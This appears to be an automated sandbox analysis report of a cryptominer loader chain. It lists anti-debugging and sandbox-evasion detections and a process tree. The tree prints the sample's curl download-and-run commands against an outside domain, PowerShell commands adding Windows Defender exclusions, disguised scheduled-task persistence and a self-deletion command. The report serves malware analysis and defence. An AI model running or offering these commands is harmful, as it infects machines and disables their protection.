Source: miner2.0.exe, 00000055.00000002.2679277773.0000000000A50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: curl.exe, 0000000A.00000003.2354085567.00000212B53C6000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000052.00000003.2618645292.000001DFDEF56000.00000004.00000020.00020000.00000000.sdmp, svchost64.exe, 0000008B.00000002.2793628082.000000001E4E4000.00000004.00000020.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2853167790.000000001DFCA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04CC01E6 Start: 04CC0289 End: 04CC01B2		0_2_04CC01E6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04CC0189 Start: 04CC0289 End: 04CC01B2		0_2_04CC0189

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04CC0942 rdtsc

0_2_04CC0942

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Code function: 7_2_00401B3F GetCurrentProcessId,CreateToolhelp32Snapshot,fwrite,Process32First,_stricmp,Process32Next,CloseHandle,CloseHandle,

7_2_00401B3F

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C5645B mov eax, dword ptr fs:[00000030h]		6_2_00C5645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C5A1C2 mov eax, dword ptr fs:[00000030h]		6_2_00C5A1C2

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Code function: 7_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,_initterm,GetStartupInfoA,		7_2_00401180
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Code function: 7_2_00402D90 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,		7_2_00402D90

Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Code function: 7_2_00401E9E puts,ShellExecuteExA,ShellExecuteExA,GetLastError,puts,printf,WaitForSingleObject,CloseHandle,

7_2_00401E9E

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe "C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del miner2.0.exe 2>nul && curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe && start miner2.0.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript conf.vbs	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\miner2.0.exe miner2.0.exe
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\services64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
